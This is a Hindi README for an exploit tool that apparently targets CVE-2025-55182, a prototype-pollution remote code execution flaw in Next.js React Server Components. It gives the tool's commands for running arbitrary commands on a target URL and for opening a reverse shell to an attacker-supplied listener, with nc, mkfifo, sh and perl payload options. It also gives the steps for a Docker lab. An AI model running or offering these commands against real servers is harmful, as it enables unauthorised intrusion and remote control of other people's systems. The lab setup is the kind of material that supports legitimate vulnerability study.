
CVE-2025-55182 के लिए एक्सप्लॉइट जो Next.js React Server Components में prototype pollution के माध्यम से remote code execution सक्षम करता है, जिसमें command execution और reverse shell क्षमताएँ शामिल हैं।
प्रोटोटाइप प्रदूषण के माध्यम से दूरस्थ कोड निष्पादन के लिए CVE-2025-55182 का शोषण करता है।
uv sync
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo
-u, --url: जाँच के लिए URL/होस्ट (आवश्यक)-c, --cmd: निष्पादित करने के लिए कमांड-r, --reverse: रिवर्स शेल मोड सक्षम करें-l, --lhost: रिवर्स शेल के लिए लिसनर होस्ट-p, --lport: रिवर्स शेल के लिए लिसनर पोर्ट-P, --payload: रिवर्स शेल पेलोड प्रकार: nc, nc-mkfifo, sh, perl (डिफ़ॉल्ट: nc)--timeout: सेकंडों में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)# Execute command
python3 exploit.py -u https://example.com -c "whoami"
# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
lab/ निर्देशिका में एक्सप्लॉइट के परीक्षण के लिए एक संपूर्ण Docker सेटअप है।
cd lab
docker-compose up -d
यह दो सेवाएँ प्रारंभ करेगा:
# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"
# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo